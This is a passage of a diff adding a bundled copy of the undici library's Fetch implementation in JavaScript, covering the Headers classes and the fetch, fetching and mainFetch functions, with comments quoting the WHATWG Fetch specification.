potentialValue, remove + // any leading and trailing HTTP whitespace bytes from + // potentialValue. + let i = 0; let j = potentialValue.length + + while (j > i && isHTTPWhiteSpaceCharCode(potentialValue.charCodeAt(j - 1))) --j + while (j > i && isHTTPWhiteSpaceCharCode(potentialValue.charCodeAt(i))) ++i + + return i === 0 && j === potentialValue.length ? potentialValue : potentialValue.substring(i, j) +} + +function fill (headers, object) { + // To fill a Headers object headers with a given object object, run these steps: + + // 1. If object is a sequence, then for each header in object: + // Note: webidl conversion to array has already been done. + if (Array.isArray(object)) { + for (let i = 0; i < object.length; ++i) { + const header = object[i] + // 1. If header does not contain exactly two items, then throw a TypeError. + if (header.length !== 2) { + throw webidl.errors.exception({ + header: 'Headers constructor', + message: `expected name/value pair to be length 2, found ${header.length}.` + }) + } + + // 2. Append (header’s first item, header’s second item) to headers. + appendHeader(headers, header[0], header[1]) + } + } else if (typeof object === 'object' && object !== null) { + // Note: null should throw + + // 2. Otherwise, object is a record, then for each key → value in object, + // append (key, value) to headers + const keys = Object.keys(object) + for (let i = 0; i < keys.length; ++i) { + appendHeader(headers, keys[i], object[keys[i]]) + } + } else { + throw webidl.errors.conversionFailed({ + prefix: 'Headers constructor', + argument: 'Argument 1', + types: ['sequence>', 'record'] + }) + } +} + +/** + * @see https://fetch.spec.whatwg.org/#concept-headers-append + */ +function appendHeader (headers, name, value) { + // 1. Normalize value. + value = headerValueNormalize(value) + + // 2. If name is not a header name or value is not a + // header value, then throw a TypeError. + if (!isValidHeaderName(name)) { + throw webidl.errors.invalidArgument({ + prefix: 'Headers.append', + value: name, + type: 'header name' + }) + } else if (!isValidHeaderValue(value)) { + throw webidl.errors.invalidArgument({ + prefix: 'Headers.append', + value, + type: 'header value' + }) + } + + // 3. If headers’s guard is "immutable", then throw a TypeError. + // 4. Otherwise, if headers’s guard is "request" and name is a + // forbidden header name, return. + // Note: undici does not implement forbidden header names + if (headers[kGuard] === 'immutable') { + throw new TypeError('immutable') + } else if (headers[kGuard] === 'request-no-cors') { + // 5. Otherwise, if headers’s guard is "request-no-cors": + // TODO + } + + // 6. Otherwise, if headers’s guard is "response" and name is a + // forbidden response-header name, return. + + // 7. Append (name, value) to headers’s header list. + return headers[kHeadersList].append(name, value) + + // 8. If headers’s guard is "request-no-cors", then remove + // privileged no-CORS request headers from headers +} + +class HeadersList { + /** @type {[string, string][]|null} */ + cookies = null + + constructor (init) { + if (init instanceof HeadersList) { + this[kHeadersMap] = new Map(init[kHeadersMap]) + this[kHeadersSortedMap] = init[kHeadersSortedMap] + this.cookies = init.cookies === null ? null : [...init.cookies] + } else { + this[kHeadersMap] = new Map(init) + this[kHeadersSortedMap] = null + } + } + + // https://fetch.spec.whatwg.org/#header-list-contains + contains (name) { + // A header list list contains a header name name if list + // contains a header whose name is a byte-case-insensitive + // match for name. + name = name.toLowerCase() + + return this[kHeadersMap].has(name) + } + + clear () { + this[kHeadersMap].clear() + this[kHeadersSortedMap] = null + this.cookies = null + } + + // https://fetch.spec.whatwg.org/#concept-header-list-append + append (name, value) { + this[kHeadersSortedMap] = null + + // 1. If list contains name, then set name to the first such + // header’s name. + const lowercaseName = name.toLowerCase() + const exists = this[kHeadersMap].get(lowercaseName) + + // 2. Append (name, value) to list. + if (exists) { + const delimiter = lowercaseName === 'cookie' ? '; ' : ', ' + this[kHeadersMap].set(lowercaseName, { + name: exists.name, + value: `${exists.value}${delimiter}${value}` + }) + } else { + this[kHeadersMap].set(lowercaseName, { name, value }) + } + + if (lowercaseName === 'set-cookie') { + this.cookies ??= [] + this.cookies.push(value) + } + } + + // https://fetch.spec.whatwg.org/#concept-header-list-set + set (name, value) { + this[kHeadersSortedMap] = null + const lowercaseName = name.toLowerCase() + + if (lowercaseName === 'set-cookie') { + this.cookies = [value] + } + + // 1. If list contains name, then set the value of + // the first such header to value and remove the + // others. + // 2. Otherwise, append header (name, value) to list. + this[kHeadersMap].set(lowercaseName, { name, value }) + } + + // https://fetch.spec.whatwg.org/#concept-header-list-delete + delete (name) { + this[kHeadersSortedMap] = null + + name = name.toLowerCase() + + if (name === 'set-cookie') { + this.cookies = null + } + + this[kHeadersMap].delete(name) + } + + // https://fetch.spec.whatwg.org/#concept-header-list-get + get (name) { + const value = this[kHeadersMap].get(name.toLowerCase()) + + // 1. If list does not contain name, then return null. + // 2. Return the values of all headers in list whose name + // is a byte-case-insensitive match for name, + // separated from each other by 0x2C 0x20, in order. + return value === undefined ? null : value.value + } + + * [Symbol.iterator] () { + // use the lowercased name + for (const [name, { value }] of this[kHeadersMap]) { + yield [name, value] + } + } + + get entries () { + const headers = {} + + if (this[kHeadersMap].size) { + for (const { name, value } of this[kHeadersMap].values()) { + headers[name] = value + } + } + + return headers + } +} + +// https://fetch.spec.whatwg.org/#headers-class +class Headers { + constructor (init = undefined) { + if (init === kConstruct) { + return + } + this[kHeadersList] = new HeadersList() + + // The new Headers(init) constructor steps are: + + // 1. Set this’s guard to "none". + this[kGuard] = 'none' + + // 2. If init is given, then fill this with init. + if (init !== undefined) { + init = webidl.converters.HeadersInit(init) + fill(this, init) + } + } + + // https://fetch.spec.whatwg.org/#dom-headers-append + append (name, value) { + webidl.brandCheck(this, Headers) + + webidl.argumentLengthCheck(arguments, 2, { header: 'Headers.append' }) + + name = webidl.converters.ByteString(name) + value = webidl.converters.ByteString(value) + + return appendHeader(this, name, value) + } + + // https://fetch.spec.whatwg.org/#dom-headers-delete + delete (name) { + webidl.brandCheck(this, Headers) + + webidl.argumentLengthCheck(arguments, 1, { header: 'Headers.delete' }) + + name = webidl.converters.ByteString(name) + + // 1. If name is not a header name, then throw a TypeError. + if (!isValidHeaderName(name)) { + throw webidl.errors.invalidArgument({ + prefix: 'Headers.delete', + value: name, + type: 'header name' + }) + } + + // 2. If this’s guard is "immutable", then throw a TypeError. + // 3. Otherwise, if this’s guard is "request" and name is a + // forbidden header name, return. + // 4. Otherwise, if this’s guard is "request-no-cors", name + // is not a no-CORS-safelisted request-header name, and + // name is not a privileged no-CORS request-header name, + // return. + // 5. Otherwise, if this’s guard is "response" and name is + // a forbidden response-header name, return. + // Note: undici does not implement forbidden header names + if (this[kGuard] === 'immutable') { + throw new TypeError('immutable') + } else if (this[kGuard] === 'request-no-cors') { + // TODO + } + + // 6. If this’s header list does not contain name, then + // return. + if (!this[kHeadersList].contains(name)) { + return + } + + // 7. Delete name from this’s header list. + // 8. If this’s guard is "request-no-cors", then remove + // privileged no-CORS request headers from this. + this[kHeadersList].delete(name) + } + + // https://fetch.spec.whatwg.org/#dom-headers-get + get (name) { + webidl.brandCheck(this, Headers) + + webidl.argumentLengthCheck(arguments, 1, { header: 'Headers.get' }) + + name = webidl.converters.ByteString(name) + + // 1. If name is not a header name, then throw a TypeError. + if (!isValidHeaderName(name)) { + throw webidl.errors.invalidArgument({ + prefix: 'Headers.get', + value: name, + type: 'header name' + }) + } + + // 2. Return the result of getting name from this’s header + // list. + return this[kHeadersList].get(name) + } + + // https://fetch.spec.whatwg.org/#dom-headers-has + has (name) { + webidl.brandCheck(this, Headers) + + webidl.argumentLengthCheck(arguments, 1, { header: 'Headers.has' }) + + name = webidl.converters.ByteString(name) + + // 1. If name is not a header name, then throw a TypeError. + if (!isValidHeaderName(name)) { + throw webidl.errors.invalidArgument({ + prefix: 'Headers.has', + value: name, + type: 'header name' + }) + } + + // 2. Return true if this’s header list contains name; + // otherwise false. + return this[kHeadersList].contains(name) + } + + // https://fetch.spec.whatwg.org/#dom-headers-set + set (name, value) { + webidl.brandCheck(this, Headers) + + webidl.argumentLengthCheck(arguments, 2, { header: 'Headers.set' }) + + name = webidl.converters.ByteString(name) + value = webidl.converters.ByteString(value) + + // 1. Normalize value. + value = headerValueNormalize(value) + + // 2. If name is not a header name or value is not a + // header value, then throw a TypeError. + if (!isValidHeaderName(name)) { + throw webidl.errors.invalidArgument({ + prefix: 'Headers.set', + value: name, + type: 'header name' + }) + } else if (!isValidHeaderValue(value)) { + throw webidl.errors.invalidArgument({ + prefix: 'Headers.set', + value, + type: 'header value' + }) + } + + // 3. If this’s guard is "immutable", then throw a TypeError. + // 4. Otherwise, if this’s guard is "request" and name is a + // forbidden header name, return. + // 5. Otherwise, if this’s guard is "request-no-cors" and + // name/value is not a no-CORS-safelisted request-header, + // return. + // 6. Otherwise, if this’s guard is "response" and name is a + // forbidden response-header name, return. + // Note: undici does not implement forbidden header names + if (this[kGuard] === 'immutable') { + throw new TypeError('immutable') + } else if (this[kGuard] === 'request-no-cors') { + // TODO + } + + // 7. Set (name, value) in this’s header list. + // 8. If this’s guard is "request-no-cors", then remove + // privileged no-CORS request headers from this + this[kHeadersList].set(name, value) + } + + // https://fetch.spec.whatwg.org/#dom-headers-getsetcookie + getSetCookie () { + webidl.brandCheck(this, Headers) + + // 1. If this’s header list does not contain `Set-Cookie`, then return « ». + // 2. Return the values of all headers in this’s header list whose name is + // a byte-case-insensitive match for `Set-Cookie`, in order. + + const list = this[kHeadersList].cookies + + if (list) { + return [...list] + } + + return [] + } + + // https://fetch.spec.whatwg.org/#concept-header-list-sort-and-combine + get [kHeadersSortedMap] () { + if (this[kHeadersList][kHeadersSortedMap]) { + return this[kHeadersList][kHeadersSortedMap] + } + + // 1. Let headers be an empty list of headers with the key being the name + // and value the value. + const headers = [] + + // 2. Let names be the result of convert header names to a sorted-lowercase + // set with all the names of the headers in list. + const names = [...this[kHeadersList]].sort((a, b) => a[0] < b[0] ? -1 : 1) + const cookies = this[kHeadersList].cookies + + // 3. For each name of names: + for (let i = 0; i < names.length; ++i) { + const [name, value] = names[i] + // 1. If name is `set-cookie`, then: + if (name === 'set-cookie') { + // 1. Let values be a list of all values of headers in list whose name + // is a byte-case-insensitive match for name, in order. + + // 2. For each value of values: + // 1. Append (name, value) to headers. + for (let j = 0; j < cookies.length; ++j) { + headers.push([name, cookies[j]]) + } + } else { + // 2. Otherwise: + + // 1. Let value be the result of getting name from list. + + // 2. Assert: value is non-null. + assert(value !== null) + + // 3. Append (name, value) to headers. + headers.push([name, value]) + } + } + + this[kHeadersList][kHeadersSortedMap] = headers + + // 4. Return headers. + return headers + } + + keys () { + webidl.brandCheck(this, Headers) + + if (this[kGuard] === 'immutable') { + const value = this[kHeadersSortedMap] + return makeIterator(() => value, 'Headers', + 'key') + } + + return makeIterator( + () => [...this[kHeadersSortedMap].values()], + 'Headers', + 'key' + ) + } + + values () { + webidl.brandCheck(this, Headers) + + if (this[kGuard] === 'immutable') { + const value = this[kHeadersSortedMap] + return makeIterator(() => value, 'Headers', + 'value') + } + + return makeIterator( + () => [...this[kHeadersSortedMap].values()], + 'Headers', + 'value' + ) + } + + entries () { + webidl.brandCheck(this, Headers) + + if (this[kGuard] === 'immutable') { + const value = this[kHeadersSortedMap] + return makeIterator(() => value, 'Headers', + 'key+value') + } + + return makeIterator( + () => [...this[kHeadersSortedMap].values()], + 'Headers', + 'key+value' + ) + } + + /** + * @param {(value: string, key: string, self: Headers) => void} callbackFn + * @param {unknown} thisArg + */ + forEach (callbackFn, thisArg = globalThis) { + webidl.brandCheck(this, Headers) + + webidl.argumentLengthCheck(arguments, 1, { header: 'Headers.forEach' }) + + if (typeof callbackFn !== 'function') { + throw new TypeError( + "Failed to execute 'forEach' on 'Headers': parameter 1 is not of type 'Function'." + ) + } + + for (const [key, value] of this) { + callbackFn.apply(thisArg, [value, key, this]) + } + } + + [Symbol.for('nodejs.util.inspect.custom')] () { + webidl.brandCheck(this, Headers) + + return this[kHeadersList] + } +} + +Headers.prototype[Symbol.iterator] = Headers.prototype.entries + +Object.defineProperties(Headers.prototype, { + append: kEnumerableProperty, + delete: kEnumerableProperty, + get: kEnumerableProperty, + has: kEnumerableProperty, + set: kEnumerableProperty, + getSetCookie: kEnumerableProperty, + keys: kEnumerableProperty, + values: kEnumerableProperty, + entries: kEnumerableProperty, + forEach: kEnumerableProperty, + [Symbol.iterator]: { enumerable: false }, + [Symbol.toStringTag]: { + value: 'Headers', + configurable: true + } +}) + +webidl.converters.HeadersInit = function (V) { + if (webidl.util.Type(V) === 'Object') { + if (V[Symbol.iterator]) { + return webidl.converters['sequence>'](V) + } + + return webidl.converters['record'](V) + } + + throw webidl.errors.conversionFailed({ + prefix: 'Headers constructor', + argument: 'Argument 1', + types: ['sequence>', 'record'] + }) +} + +module.exports = { + fill, + Headers, + HeadersList +} + + +/***/ }), + +/***/ 4881: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; +// https://github.com/Ethan-Arrowood/undici-fetch + + + +const { + Response, + makeNetworkError, + makeAppropriateNetworkError, + filterResponse, + makeResponse +} = __nccwpck_require__(7823) +const { Headers } = __nccwpck_require__(554) +const { Request, makeRequest } = __nccwpck_require__(8359) +const zlib = __nccwpck_require__(9796) +const { + bytesMatch, + makePolicyContainer, + clonePolicyContainer, + requestBadPort, + TAOCheck, + appendRequestOriginHeader, + responseLocationURL, + requestCurrentURL, + setRequestReferrerPolicyOnRedirect, + tryUpgradeRequestToAPotentiallyTrustworthyURL, + createOpaqueTimingInfo, + appendFetchMetadata, + corsCheck, + crossOriginResourcePolicyCheck, + determineRequestsReferrer, + coarsenedSharedCurrentTime, + createDeferredPromise, + isBlobLike, + sameOrigin, + isCancelled, + isAborted, + isErrorLike, + fullyReadBody, + readableStreamClose, + isomorphicEncode, + urlIsLocal, + urlIsHttpHttpsScheme, + urlHasHttpsScheme +} = __nccwpck_require__(2538) +const { kState, kHeaders, kGuard, kRealm } = __nccwpck_require__(5861) +const assert = __nccwpck_require__(9491) +const { safelyExtractBody } = __nccwpck_require__(1472) +const { + redirectStatusSet, + nullBodyStatus, + safeMethodsSet, + requestBodyHeader, + subresourceSet, + DOMException +} = __nccwpck_require__(1037) +const { kHeadersList } = __nccwpck_require__(2785) +const EE = __nccwpck_require__(2361) +const { Readable, pipeline } = __nccwpck_require__(2781) +const { addAbortListener, isErrored, isReadable, nodeMajor, nodeMinor } = __nccwpck_require__(3983) +const { dataURLProcessor, serializeAMimeType } = __nccwpck_require__(685) +const { TransformStream } = __nccwpck_require__(5356) +const { getGlobalDispatcher } = __nccwpck_require__(1892) +const { webidl } = __nccwpck_require__(1744) +const { STATUS_CODES } = __nccwpck_require__(3685) +const GET_OR_HEAD = ['GET', 'HEAD'] + +/** @type {import('buffer').resolveObjectURL} */ +let resolveObjectURL +let ReadableStream = globalThis.ReadableStream + +class Fetch extends EE { + constructor (dispatcher) { + super() + + this.dispatcher = dispatcher + this.connection = null + this.dump = false + this.state = 'ongoing' + // 2 terminated listeners get added per request, + // but only 1 gets removed. If there are 20 redirects, + // 21 listeners will be added. + // See https://github.com/nodejs/undici/issues/1711 + // TODO (fix): Find and fix root cause for leaked listener. + this.setMaxListeners(21) + } + + terminate (reason) { + if (this.state !== 'ongoing') { + return + } + + this.state = 'terminated' + this.connection?.destroy(reason) + this.emit('terminated', reason) + } + + // https://fetch.spec.whatwg.org/#fetch-controller-abort + abort (error) { + if (this.state !== 'ongoing') { + return + } + + // 1. Set controller’s state to "aborted". + this.state = 'aborted' + + // 2. Let fallbackError be an "AbortError" DOMException. + // 3. Set error to fallbackError if it is not given. + if (!error) { + error = new DOMException('The operation was aborted.', 'AbortError') + } + + // 4. Let serializedError be StructuredSerialize(error). + // If that threw an exception, catch it, and let + // serializedError be StructuredSerialize(fallbackError). + + // 5. Set controller’s serialized abort reason to serializedError. + this.serializedAbortReason = error + + this.connection?.destroy(error) + this.emit('terminated', error) + } +} + +// https://fetch.spec.whatwg.org/#fetch-method +function fetch (input, init = {}) { + webidl.argumentLengthCheck(arguments, 1, { header: 'globalThis.fetch' }) + + // 1. Let p be a new promise. + const p = createDeferredPromise() + + // 2. Let requestObject be the result of invoking the initial value of + // Request as constructor with input and init as arguments. If this throws + // an exception, reject p with it and return p. + let requestObject + + try { + requestObject = new Request(input, init) + } catch (e) { + p.reject(e) + return p.promise + } + + // 3. Let request be requestObject’s request. + const request = requestObject[kState] + + // 4. If requestObject’s signal’s aborted flag is set, then: + if (requestObject.signal.aborted) { + // 1. Abort the fetch() call with p, request, null, and + // requestObject’s signal’s abort reason. + abortFetch(p, request, null, requestObject.signal.reason) + + // 2. Return p. + return p.promise + } + + // 5. Let globalObject be request’s client’s global object. + const globalObject = request.client.globalObject + + // 6. If globalObject is a ServiceWorkerGlobalScope object, then set + // request’s service-workers mode to "none". + if (globalObject?.constructor?.name === 'ServiceWorkerGlobalScope') { + request.serviceWorkers = 'none' + } + + // 7. Let responseObject be null. + let responseObject = null + + // 8. Let relevantRealm be this’s relevant Realm. + const relevantRealm = null + + // 9. Let locallyAborted be false. + let locallyAborted = false + + // 10. Let controller be null. + let controller = null + + // 11. Add the following abort steps to requestObject’s signal: + addAbortListener( + requestObject.signal, + () => { + // 1. Set locallyAborted to true. + locallyAborted = true + + // 2. Assert: controller is non-null. + assert(controller != null) + + // 3. Abort controller with requestObject’s signal’s abort reason. + controller.abort(requestObject.signal.reason) + + // 4. Abort the fetch() call with p, request, responseObject, + // and requestObject’s signal’s abort reason. + abortFetch(p, request, responseObject, requestObject.signal.reason) + } + ) + + // 12. Let handleFetchDone given response response be to finalize and + // report timing with response, globalObject, and "fetch". + const handleFetchDone = (response) => + finalizeAndReportTiming(response, 'fetch') + + // 13. Set controller to the result of calling fetch given request, + // with processResponseEndOfBody set to handleFetchDone, and processResponse + // given response being these substeps: + + const processResponse = (response) => { + // 1. If locallyAborted is true, terminate these substeps. + if (locallyAborted) { + return Promise.resolve() + } + + // 2. If response’s aborted flag is set, then: + if (response.aborted) { + // 1. Let deserializedError be the result of deserialize a serialized + // abort reason given controller’s serialized abort reason and + // relevantRealm. + + // 2. Abort the fetch() call with p, request, responseObject, and + // deserializedError. + + abortFetch(p, request, responseObject, controller.serializedAbortReason) + return Promise.resolve() + } + + // 3. If response is a network error, then reject p with a TypeError + // and terminate these substeps. + if (response.type === 'error') { + p.reject( + Object.assign(new TypeError('fetch failed'), { cause: response.error }) + ) + return Promise.resolve() + } + + // 4. Set responseObject to the result of creating a Response object, + // given response, "immutable", and relevantRealm. + responseObject = new Response() + responseObject[kState] = response + responseObject[kRealm] = relevantRealm + responseObject[kHeaders][kHeadersList] = response.headersList + responseObject[kHeaders][kGuard] = 'immutable' + responseObject[kHeaders][kRealm] = relevantRealm + + // 5. Resolve p with responseObject. + p.resolve(responseObject) + } + + controller = fetching({ + request, + processResponseEndOfBody: handleFetchDone, + processResponse, + dispatcher: init.dispatcher ?? getGlobalDispatcher() // undici + }) + + // 14. Return p. + return p.promise +} + +// https://fetch.spec.whatwg.org/#finalize-and-report-timing +function finalizeAndReportTiming (response, initiatorType = 'other') { + // 1. If response is an aborted network error, then return. + if (response.type === 'error' && response.aborted) { + return + } + + // 2. If response’s URL list is null or empty, then return. + if (!response.urlList?.length) { + return + } + + // 3. Let originalURL be response’s URL list[0]. + const originalURL = response.urlList[0] + + // 4. Let timingInfo be response’s timing info. + let timingInfo = response.timingInfo + + // 5. Let cacheState be response’s cache state. + let cacheState = response.cacheState + + // 6. If originalURL’s scheme is not an HTTP(S) scheme, then return. + if (!urlIsHttpHttpsScheme(originalURL)) { + return + } + + // 7. If timingInfo is null, then return. + if (timingInfo === null) { + return + } + + // 8. If response’s timing allow passed flag is not set, then: + if (!response.timingAllowPassed) { + // 1. Set timingInfo to a the result of creating an opaque timing info for timingInfo. + timingInfo = createOpaqueTimingInfo({ + startTime: timingInfo.startTime + }) + + // 2. Set cacheState to the empty string. + cacheState = '' + } + + // 9. Set timingInfo’s end time to the coarsened shared current time + // given global’s relevant settings object’s cross-origin isolated + // capability. + // TODO: given global’s relevant settings object’s cross-origin isolated + // capability? + timingInfo.endTime = coarsenedSharedCurrentTime() + + // 10. Set response’s timing info to timingInfo. + response.timingInfo = timingInfo + + // 11. Mark resource timing for timingInfo, originalURL, initiatorType, + // global, and cacheState. + markResourceTiming( + timingInfo, + originalURL, + initiatorType, + globalThis, + cacheState + ) +} + +// https://w3c.github.io/resource-timing/#dfn-mark-resource-timing +function markResourceTiming (timingInfo, originalURL, initiatorType, globalThis, cacheState) { + if (nodeMajor > 18 || (nodeMajor === 18 && nodeMinor >= 2)) { + performance.markResourceTiming(timingInfo, originalURL.href, initiatorType, globalThis, cacheState) + } +} + +// https://fetch.spec.whatwg.org/#abort-fetch +function abortFetch (p, request, responseObject, error) { + // Note: AbortSignal.reason was added in node v17.2.0 + // which would give us an undefined error to reject with. + // Remove this once node v16 is no longer supported. + if (!error) { + error = new DOMException('The operation was aborted.', 'AbortError') + } + + // 1. Reject promise with error. + p.reject(error) + + // 2. If request’s body is not null and is readable, then cancel request’s + // body with error. + if (request.body != null && isReadable(request.body?.stream)) { + request.body.stream.cancel(error).catch((err) => { + if (err.code === 'ERR_INVALID_STATE') { + // Node bug? + return + } + throw err + }) + } + + // 3. If responseObject is null, then return. + if (responseObject == null) { + return + } + + // 4. Let response be responseObject’s response. + const response = responseObject[kState] + + // 5. If response’s body is not null and is readable, then error response’s + // body with error. + if (response.body != null && isReadable(response.body?.stream)) { + response.body.stream.cancel(error).catch((err) => { + if (err.code === 'ERR_INVALID_STATE') { + // Node bug? + return + } + throw err + }) + } +} + +// https://fetch.spec.whatwg.org/#fetching +function fetching ({ + request, + processRequestBodyChunkLength, + processRequestEndOfBody, + processResponse, + processResponseEndOfBody, + processResponseConsumeBody, + useParallelQueue = false, + dispatcher // undici +}) { + // 1. Let taskDestination be null. + let taskDestination = null + + // 2. Let crossOriginIsolatedCapability be false. + let crossOriginIsolatedCapability = false + + // 3. If request’s client is non-null, then: + if (request.client != null) { + // 1. Set taskDestination to request’s client’s global object. + taskDestination = request.client.globalObject + + // 2. Set crossOriginIsolatedCapability to request’s client’s cross-origin + // isolated capability. + crossOriginIsolatedCapability = + request.client.crossOriginIsolatedCapability + } + + // 4. If useParallelQueue is true, then set taskDestination to the result of + // starting a new parallel queue. + // TODO + + // 5. Let timingInfo be a new fetch timing info whose start time and + // post-redirect start time are the coarsened shared current time given + // crossOriginIsolatedCapability. + const currenTime = coarsenedSharedCurrentTime(crossOriginIsolatedCapability) + const timingInfo = createOpaqueTimingInfo({ + startTime: currenTime + }) + + // 6. Let fetchParams be a new fetch params whose + // request is request, + // timing info is timingInfo, + // process request body chunk length is processRequestBodyChunkLength, + // process request end-of-body is processRequestEndOfBody, + // process response is processResponse, + // process response consume body is processResponseConsumeBody, + // process response end-of-body is processResponseEndOfBody, + // task destination is taskDestination, + // and cross-origin isolated capability is crossOriginIsolatedCapability. + const fetchParams = { + controller: new Fetch(dispatcher), + request, + timingInfo, + processRequestBodyChunkLength, + processRequestEndOfBody, + processResponse, + processResponseConsumeBody, + processResponseEndOfBody, + taskDestination, + crossOriginIsolatedCapability + } + + // 7. If request’s body is a byte sequence, then set request’s body to + // request’s body as a body. + // NOTE: Since fetching is only called from fetch, body should already be + // extracted. + assert(!request.body || request.body.stream) + + // 8. If request’s window is "client", then set request’s window to request’s + // client, if request’s client’s global object is a Window object; otherwise + // "no-window". + if (request.window === 'client') { + // TODO: What if request.client is null? + request.window = + request.client?.globalObject?.constructor?.name === 'Window' + ? request.client + : 'no-window' + } + + // 9. If request’s origin is "client", then set request’s origin to request’s + // client’s origin. + if (request.origin === 'client') { + // TODO: What if request.client is null? + request.origin = request.client?.origin + } + + // 10. If all of the following conditions are true: + // TODO + + // 11. If request’s policy container is "client", then: + if (request.policyContainer === 'client') { + // 1. If request’s client is non-null, then set request’s policy + // container to a clone of request’s client’s policy container. [HTML] + if (request.client != null) { + request.policyContainer = clonePolicyContainer( + request.client.policyContainer + ) + } else { + // 2. Otherwise, set request’s policy container to a new policy + // container. + request.policyContainer = makePolicyContainer() + } + } + + // 12. If request’s header list does not contain `Accept`, then: + if (!request.headersList.contains('accept')) { + // 1. Let value be `*/*`. + const value = '*/*' + + // 2. A user agent should set value to the first matching statement, if + // any, switching on request’s destination: + // "document" + // "frame" + // "iframe" + // `text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8` + // "image" + // `image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5` + // "style" + // `text/css,*/*;q=0.1` + // TODO + + // 3. Append `Accept`/value to request’s header list. + request.headersList.append('accept', value) + } + + // 13. If request’s header list does not contain `Accept-Language`, then + // user agents should append `Accept-Language`/an appropriate value to + // request’s header list. + if (!request.headersList.contains('accept-language')) { + request.headersList.append('accept-language', '*') + } + + // 14. If request’s priority is null, then use request’s initiator and + // destination appropriately in setting request’s priority to a + // user-agent-defined object. + if (request.priority === null) { + // TODO + } + + // 15. If request is a subresource request, then: + if (subresourceSet.has(request.destination)) { + // TODO + } + + // 16. Run main fetch given fetchParams. + mainFetch(fetchParams) + .catch(err => { + fetchParams.controller.terminate(err) + }) + + // 17. Return fetchParam's controller + return fetchParams.controller +} + +// https://fetch.spec.whatwg.org/#concept-main-fetch +async function mainFetch (fetchParams, recursive = false) { + // 1. Let request be fetchParams’s request. + const request = fetchParams.request + + // 2. Let response be null. + let response = null + + // 3. If request’s local-URLs-only flag is set and request’s current URL is + // not local, then set response to a network error. + if (request.localURLsOnly && !urlIsLocal(requestCurrentURL(request))) { + response = makeNetworkError('local URLs only') + } + + // 4. Run report Content Security Policy violations for request. + // TODO + + // 5. Upgrade request to a potentially trustworthy URL, if appropriate. + tryUpgradeRequestToAPotentiallyTrustworthyURL(request) + + // 6. If should request be blocked due to a bad port, should fetching request + // be blocked as mixed content, or should request be blocked by Content + // Security Policy returns blocked, then set response to a network error. + if (requestBadPort(request) === 'blocked') { + response = makeNetworkError('bad port') + } + // TODO: should fetching request be blocked as mixed content? + // TODO: should request be blocked by Content Security Policy? + + // 7. If request’s referrer policy is the empty string, then set request’s + // referrer policy to request’s policy container’s referrer policy. + if (request.referrerPolicy === '') { + request.referrerPolicy = request.policyContainer.referrerPolicy + } + + // 8. If request’s referrer is not "no-referrer", then set request’s + // referrer to the result of invoking determine request’s referrer. + if (request.referrer !== 'no-referrer') { + request.referrer = determineRequestsReferrer(request) + } + + // 9. Set request’s current URL’s scheme to "https" if all of the following + // conditions are true: + // - request’s current URL’s scheme is "http" + // - request’s current URL’s host is a domain + // - Matching request’s current URL’s host per Known HSTS Host Domain Name + // Matching results in either a superdomain match with an asserted + // includeSubDomains directive or a congruent match (with or without an + // asserted includeSubDomains directive). [HSTS] + // TODO + + // 10. If recursive is false, then run the remaining steps in parallel. + // TODO + + // 11. If response is null, then set response to the result of running + // the steps corresponding to the first matching statement: + if (response === null) { + response = await (async () => { + const currentURL = requestCurrentURL(request) + + if ( + // - request’s current URL’s origin is same origin with request’s origin, + // and request’s response tainting is "basic" + (sameOrigin(currentURL, request.url) && request.responseTainting === 'basic') || + // request’s current URL’s scheme is "data" + (currentURL.protocol === 'data:') || + // - request’s mode is "navigate" or "websocket" + (request.mode === 'navigate' || request.mode === 'websocket') + ) { + // 1. Set request’s response tainting to "basic". + request.responseTainting = 'basic' + + // 2. Return the result of running scheme fetch given fetchParams. + return await schemeFetch(fetchParams) + } + + // request’s mode is "same-origin" + if (request.mode === 'same-origin') { + // 1. Return a network error. + return makeNetworkError('request mode cannot be "same-origin"') + } + + // request’s mode is "no-cors" + if (request.mode === 'no-cors') { + // 1. If request’s redirect mode is not "follow", then return a network + // error. + if (request.redirect !== 'follow') { + return makeNetworkError( + 'redirect mode cannot be "follow" for "no-cors" request' + ) + } + + // 2. Set request’s response tainting to "opaque". + request.responseTainting = 'opaque' + + // 3. Return the result of running scheme fetch given fetchParams. + return await schemeFetch(fetchParams) + } + + // request’s current URL’s scheme is not an HTTP(S) scheme + if (!urlIsHttpHttpsScheme(requestCurrentURL(request))) { + // Return a network error. + return makeNetworkError('URL scheme must be a HTTP(S) scheme') + } + + // - request’s use-CORS-preflight flag is set + // - request’s unsafe-request flag is set and either request’s method is + // not a CORS-safelisted method or CORS-unsafe request-header names with + // request’s header list is not empty + // 1. Set request’s response tainting to "cors". + // 2. Let corsWithPreflightResponse be the result of running HTTP fetch + // given fetchParams and true. + // 3. If corsWithPreflightResponse is a network error, then clear cache + // entries using request. + // 4. Return corsWithPreflightResponse. + // TODO + + // Otherwise + // 1. Set request’s response tainting to "cors". + request.responseTainting = 'cors' + + // 2. Return the result of running HTTP fetch given fetchParams. + return await httpFetch(fetchParams) + })() + } + + // 12. If recursive is true, then return response. + if (recursive) { + return response + } + + // 13. If response is not a network error and response is not a filtered + // response, then: + if (response.status !== 0 && !response.internalResponse) { + // If request’s response tainting is "cors", then: + if (request.responseTainting === 'cors') { + // 1. Let headerNames be the result of extracting header list values + // given `Access-Control-Expose-Headers` and response’s header list. + // TODO + // 2. If request’s credentials mode is not "include" and headerNames + // contains `*`, then set response’s CORS-exposed header-name list to + // all unique header names in response’s header list. + // TODO + // 3. Otherwise, if headerNames is not null or failure, then set + // response’s CORS-exposed header-name list to headerNames. + // TODO + } + + // Set response to the following filtered response with response as its + // internal response, depending on request’s response tainting: + if (request.responseTainting === 'basic') { + response = filterResponse(response, 'basic') + } else if (request.responseTainting === 'cors') { + response = filterResponse(response, 'cors') + } else if (request.responseTainting === 'opaque') { + response = filterResponse(response, 'opaque') + } else { + assert(false) + } + } + + // 14. Let internalResponse be response, if response is a network error, + // and response’s internal response otherwise. + let internalResponse = + response.status === 0 ? response : response.internalResponse + + // 15. If internalResponse’s URL list is empty, then set it to a clone of + // request’s URL list. + if (internalResponse.urlList.length === 0) { + internalResponse.urlList.push(...request.urlList) + } + + // 16. If request’s timing allow failed flag is unset, then set + // internalResponse’s timing allow passed flag. + if (!request.timingAllowFailed) { + response.timingAllowPassed = true + } + + // 17. If response is not a network error and any of the following returns + // blocked + // - should internalResponse to request be blocked as mixed content + // - should internalResponse to request be blocked by Content Security Policy + // - should internalResponse to request be blocked due to its MIME 